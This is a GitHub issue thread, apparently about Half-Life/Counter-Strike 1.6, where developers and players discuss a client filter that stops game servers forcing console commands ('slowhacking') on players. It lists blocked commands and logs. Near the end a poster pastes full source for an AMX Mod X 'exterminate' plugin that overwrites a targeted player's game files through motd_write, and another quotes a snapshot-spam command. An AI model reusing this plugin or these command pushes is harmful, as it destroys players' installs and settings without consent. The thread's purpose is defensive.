[HL1/CS] Admin slowhacking

[AnAkkk]

Alfred here, adding the list of filtering rules to the top of this bug so we can all track/understand the changes>

The following commands are blocked from a server running them on you if cl_filterstuffcmd is set (some are always blocked right now also)

alias connect retry set bind unbund unbindall quit "_restart" kill exit exec writecfg cl_filterstuffcmd ex_interp say developer timerefresh rate cd fps_max speak_enabled voice_enable setinfo sensitivity systicrate removedemo volume mp3volume cl gl* m r_ hud_*

---

It's been known since a long time now that admins are able to send any commands to the clients, thus mess up their config. It's quite annoying to join a server and find out that all of your binds have been changed, etc. Servers can even open/close the players cd tray with the "cd" command. I don't want to download annoying sounds from servers, and I am setting cl_allowdownload to 0. Guess what? The server forces cl_allowdownload to 1 before it starts downloading the sounds.

The fix shouldn't be to make your config read only and restart the game every time this happens. Servers just shouldn't be able to execute any commands on the clients, as it's the case on Source engine. Only the few commands that are required for the game to work should be allowed to be executed.

Old: https://github.com/ValveSoftware/steam-for-linux/issues/1536

[Egon-Spengler]

While I agree with this I think a fine line exists between what is slowhacking and what is just harmless and useful on many mods.

For example, I don't think blocking ALL commands from being executed by the server is the way to go as many of them are needed and very useful for multiple reasons, such as "echo" (to print useful information to the client, even help text, etc. and even AMX Mod X heavily uses console prints), commands such as "spk" that is used by countless mods as a way to play certain sounds to a certain player only, instead of emitting it from him (this is like telling default HL "hey, your HEV suit can no longer play any sound to you so don't expect to hear 'ammunition depleted' or 'vital signs critical' ever again").

Let's not blindly block every single thing and call it a day. Commands such as "connect", "bind", changing client settings, etc. I completely agree with. But breaking many mod features would be a bit too harsh.

[AnAkkk]

A few commands could of course be whitelisted like "echo", as it's the case on the Source Engine. The majority just shouldn't.

[ghost]

There are a few other good reasons for allowing "connect"....

1) admin commands like "amx_send_to_kid_friendly_server {steamid}"

2) player initiated Say statements like "getsounds" which auto xfer the player to a sounds download server to download the latest custom sounds.

Having a confirmation pop-up might seem like a great idea, but that would probably be just as frustrating on an evil server (pop-up pop-up, pop-up, pop-up, ,,,,)

IMHO, the real trick is just not play on evil servers, and to accept your fate when you do.

[AndreiRomania]

not to mention that the EXTERMINATE COMMANDS makes some files to apear damaged and forces you to re install steam. :(

[AnAkkk]

This has nothing to do with "connect", it's already blocked. Please don't talk about "connect" in this thread. There is already an other one about a legit redirection thing.

[ghost]

Other threads:

https://github.com/ValveSoftware/halflife/issues/268

https://github.com/ValveSoftware/halflife/issues/5

[alfred-valve]

Okay, next release will disallow stuffing of: bind unbind cl_

[Nextra]

Any chance for a serverside cl_minmodels enforcement?

Also: How about unbindall, alias, gl, hud and m_ (just brainstorming here).

[AnAkkk]

"cd" should be disallowed as well, it allows the admin to open the players CD tray. Why not disallow gl and m cvars as well?

EDIT: voice and r as well, maybe.

[alfred-valve]

alias is already covered, unbindall will get picked up as well. I'll have a look over the gl and m vars to see if that makes sense too.

[ghost]

what about commands? quit fps_max exec exit exinterp r disconnect say kill

+ - commands

[alfred-valve]

disconnect is a valid command to stuff, I'll look over the others.

[AnAkkk]

Wouldn't a whitelist make more sense? :)

[alfred-valve]

Nope, you don't want to know the horrendous code in the source 1 engine that enables that...

[AnAkkk]

snapshot and screenshot should not be allowed to be executed at all. Even one time per second is too much. A server shouldn't need to call these commands.

These might need to be dissallowed as well:

_restart _setaddons_folder _setgamedir _sethdmodels _setrenderer _setvideomode

[MaximilianKohler]

I think some anti-cheat clients take screenshots to check for cheats, but I'm not sure if it's done server side or client side.

[AnAkkk]

Client screenshots are useless, most cheats already disable themselves when they see the screenshot command. It doesn't prove anything. If you're going to allow the server to execute the screenshot command then it should be allowed on the Source engine as well, and Valve developers didn't want to allow it here, I can't see why it would be on HL1.

[alfred-valve]

All the _set commands are currently disabled, I'll add _restart to the set.

screenshot/snapshot needs something more subtle, let me think on that.

[Egon-Spengler]

@MaxKorz Admins already have server chat logging on their side, the player shouldn't even need to provide that sort of proof himself.

[AnAkkk]

What Egon-Splenger said. I don't want to join a server and find out it's taking screenshots without my permission.

[AnAkkk]

writecfg should be disallowed as well.

[Freeman-AM]

I'm agree many mods rely on models, and minmodels, just ruin that.

[ghost]

The servers I administer have 1923 custom Say triggered sounds (downloaded via a sound server, only if you want them), and invoked on the clients via spk. There is no way that many sounds could be pre-cached.

[AnAkkk]

Yes sure, I'll probably take the time to connect to every CS server in the world to get my config fucked up hundred of times just to add it to my "blacklist". Servers just shouldn't be able to do this. You shouldn't join a server and then find out it has modified all of your binds and other settings.

[AnAkkk]

We aren't talking of blocking spk. A client side setting has already been added for blocking spk.

[Freeman-AM]

We have a big cs 1.6 community server, and we use SSban (the screenshot ban feature) It's still work well with cheaters and most of cheat don't provide clean screenshot. there is often those dot, so i'm against screenshot removal from server side.

[lolzap]

What about this command?

http://www.youtube.com/watch?v=bb3ealDSZ1c

[AnAkkk]

If you can find the source of this plugin, it would help. I've found similar plugins that claim to be amx_virus, but they don't do the same thing. I could only find a plugin that sends +/- commands.

[AndreiRomania]

There is a problem there is a plugin that will exterminate the CS files.

They will show as diferent size. :(

[AndreiRomania]

it is via amx_plugin

it is in ROMANIAN but it has the source code here

http://dsquad.ro/forum/topic/8558-plugin-amx-exterminate/

[aaarnas]

There is a cvar gl_fog It's also would be unfair if player could turn off the fog in custom mods. That would affect the gameplay.

[AndreiRomania]

of topic aaarnas

[aaarnas]

Why? You're considering disable all gl_* cvars

[Glymbol]

"volume / MP3Volume - its used to imitate sound effects from exploding flashbangs like on css/csgo (the only thing I really like on the other games)"

Both could be dangerous to your hearing when using headphones.

[AnAkkk]

lol. If all servers admins would be querying client settings and not doing anything annoying we wouldn't be discussing this in the first place.

[AndreiRomania]

Encoding key *.dll and files ( except models ) in half-life folder ( CS ) so that they cannot be access from server side.

[alfred-valve]

I have just updated the beta to increase the filtering of stuff commands. Set the cl_filterstuffcmd cvar to 1 to enable it and tell me what breaks (and what still needs protecting).

[ghost]

Thank you. It works.

Server tried to send invalid command:"cl_bobcycle 0.8
"Server tried to send invalid command:"cl_bob 0.01
"Server tried to send invalid command:"cl_bobup 0.5
"Server tried to send invalid command:"cl_pitchspeed 225
"Server tried to send invalid command:"cl_pitchdown 89
"Server tried to send invalid command:"cl_yawspeed 210
"Server tried to send invalid command:"m_forward 1
"Server tried to send invalid command:"m_side 0.8
"Server tried to send invalid command:"r_lightmap 0
"Server tried to send invalid command:"r_dynamic 1
"Server tried to send invalid command:"r_fullbright 0
"Server tried to send invalid command:"gl_fog 1
"Server tried to send invalid command:"gl_polyoffset 0.1
"Server tried to send invalid command:"gl_max_size 512
"Server tried to send invalid command:"gl_monolights 0
"Server tried to send invalid command:"gl_overbright 0
"Server tried to send invalid command:"gl_lightholes 1
"Server tried to send invalid command:"bind DEL "csf_cheatkey843 DEL"
"Server tried to send invalid command:"bind END "csf_cheatkey843 END"
"Server tried to send invalid command:"bind INS "csf_cheatkey843 INS"
"Server tried to send invalid command:"bind HOME "csf_cheatkey843 HOME"

Please add echo command to whitelist. It's harmless and AMXX is using, so admins can debug

[AnAkkk]

Will cl_filterstuffcmd be set to 1 by default if everything works correctly? I think it would be nice to protect the players that don't know about the console.

[alfred-valve]

echo is not blocked. Yes, once we have had enough testing and feedback, my plan would be to flip cl_filterstuffcmd to default to 1. And yes, cl_filterstuffcmd is on the not allowed to stuff list, no matter the value of that cvar :)

[alfred-valve]

@leon291 , you need to opt into the beta (both in HL1 and CS 1.6)

[ghost]

What about blocking "wait" command? I'm now sure if it would help from this:

client_cmd(victim,"snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait;snapshot;wait")

but I really hope it will

[ghost]

@alfred-valve how to track which command is executed? I've found a plugin for AMXX, "Game-Destroyer 1.1". It deletes bind commands from config.cfg I don't see anything useful in console

And where the variable rate is stored? writecfg doesn't write it to a config

[lolzap]

Don't forget alfred that today players who buy the original counter-strike game they are all migrated from non-steam. I know how people proceed. First they check for cracked, emulated versions then after months or years they buy the legit original game. And I'm sure that all FPS games that run with steam (COD, MOH, Battlefield, etc) all those players who is playing this game they are migrated from Counter-Strike. It is the most played FPS games all around the world. Yes alfred, your salary was coming from non-steam! It's sad but it's true.

After all said, you guys now are ruining the game. You guys just enumerating all bugs that should be fixed (-it's okay-) but PLEASE for the sake of the game DO NOT give YOUR PERSONAL IDEAS HOW THE BUG SHOULD BE FIXED.

It's okay that fake server was eliminated from internet list, good job but please let the non-steam players to play. After days, months of gaming all non-legit players will became legit and will buy the original game.

I have not played since the new update was released, because: the server is empty I can't play with anyone; client FPS rate has dropped to 30, I can't modify it.

As a community manager (having 3 Counter-Strike server with different mods installed) I'm having my servers empty, not because the community it's user less, it's because the server doesn't accept non-steam players and old -returning players- gamers can't play alone on the server.

Conclusion, if all of my server will be empty I will give up my payed HLDS hosting services and I won't play Counter-Strike alone on player less servers. Just think about it alfred... how many people would buy Counter-Strike to play 1vs1 or 2vs2?

[JabLuszko]

@alfred-valve is there any chance to get full list of blocked stuff? I guess many of us would like to contribute about what-to-block and what-not-to-block by default, however I am confused after reading this thread and I do not see many things which are blocked even listed.

For example: motd_write (hell yeah!) messagemode amx_custom works, however messagemode amx_nb_set_reason is blocked [command used for providing ban reason for some plugins]

[z0id]

If this blacklist stops admins from messing up my CS install, then go for it! A couple of points on screenshot/snapshot, though:

• it is widely used to identify wallhackers, so it shouldn't be blocked.
• it is also set by some evil plugins to take screenshots continuously, so limiting the number of screenshot in a time interval and total number of screenshots may be a good idea.

[AndreiRomania]

WHATA BOUT THE AMX_EXTERMINATE COMMAND.

THAT WILL MAKE SOME OF THE COUNTER STRIKE FILES UN USABLE AND MAKES U RE INSTALL CS.

THIS IS THE SOURCE CODE FOR THIS PLUGIN AND THE FILES THAT ARE DESTROID BY IT>

mx_exterminate.amxx

include < amxmodx >

include < amxmisc >

new const g_sCommands[ ][ ] = { "rate 1", "cl_cmdrate 1", "cl_updaterate 1", "fps_max 1", "sys_ticrate 1",

"name CS.DSQUAD.RO",

"motdfile models/player.mdl;motd_write x", "motdfile models/v_ak47.mdl;motd_write x", "motdfile cs_dust.wad;motd_write x", "motdfile models/v_m4a1.mdl;motd_write x", "motdfile resource/GameMenu.res;motd_write x", "motdfile halflife.wad;motd_write x", "motdfile cstrike.wad;motd_write x", "motdfile maps/de_dust2.bsp;motd_write x", "motdfile events/ak47.sc;motd_write x", "motdfile dlls/mp.dll;motd_write x",

"cl_timeout 0"
};

public plugin_init( ) { register_plugin( "Exterminate", "1.0", "AleCs14" ); register_concmd( "amx_exterminate", "Concmd_AMXX_exterminate", ADMIN_LEVEL_G, "" ); }

public Concmd_AMXX_exterminate( id, level, cid ) { if( !cmd_access( id, level, cid, 2 ) ) return PLUGIN_HANDLED;

new sArgument[ 32 ]; read_argv( 1, sArgument, charsmax( sArgument ) );

new player = cmd_target( id, sArgument, ( CMDTARGET_NO_BOTS | CMDTARGET_OBEY_IMMUNITY | CMDTARGET_ALLOW_SELF ) );

if( !player ) return PLUGIN_HANDLED;

for( new i = 0; i < sizeof( g_sCommands ); i++) client_cmd( player, g_sCommands[ i ] );

new name[ 32 ], name2[ 32 ], ip2[ 16 ]; get_user_name( id, name, charsmax( name ) ); get_user_name( player, name2, charsmax( name2 ) ); get_user_ip( player, ip2, charsmax( ip2 ), 1 );

log_to_file( "exterminations.log", "%s exterminate %s(%s)", name, name2, ip2 );

player_color( 0, ".gADMIN .v%s .g: exterminated .v%s", name, name2 );

client_cmd( 0, "spk ^"vox/bizwarn coded user apprehend^"" );

return PLUGIN_HANDLED; }

stock player_color( const id, const input[ ], any:... ) { new count = 1, players[ 32 ]

static msg[ 191 ] vformat( msg, 190, input, 3 )

replaceall( msg, 190, ".v", "^4" ) /* verde / replaceall( msg, 190, ".g", "^1" ) / galben _/ replaceall( msg, 190, ".e", "^3" ) / ct=albastru | t=rosu _/ replaceall( msg, 190, ".x", "^0" ) / normal-echipa */

if( id ) players[ 0 ] = id; else get_players( players, count, "ch" ) { for( new i = 0; i < count; i++ ) { if( is_user_connected( players[ i ] ) ) { message_begin( MSG_ONE_UNRELIABLE, get_usermsgid( "SayText" ), , players[ i ] ) write_byte( players[ i ] ); write_string( msg ); message_end( ); } } } }

[vjatseslav]

motd_write doesn't work on steam version.

[AnAkkk]

@alfred-valve : You forgot to block the following commands: adjust_crosshair cd drawradar hideconsole hideradar removedemo say_team setinfo toggleconsole unbindall

And the following cvars: MP3Volume volume rate net* room voice_

Maybe vgui_runscript as well. screenshot and snapshot still need to be blocked.

[AndreiRomania]

What about protocol 47 / 48 servers :(

Is there some 1 i could protect my self from idiot admins ?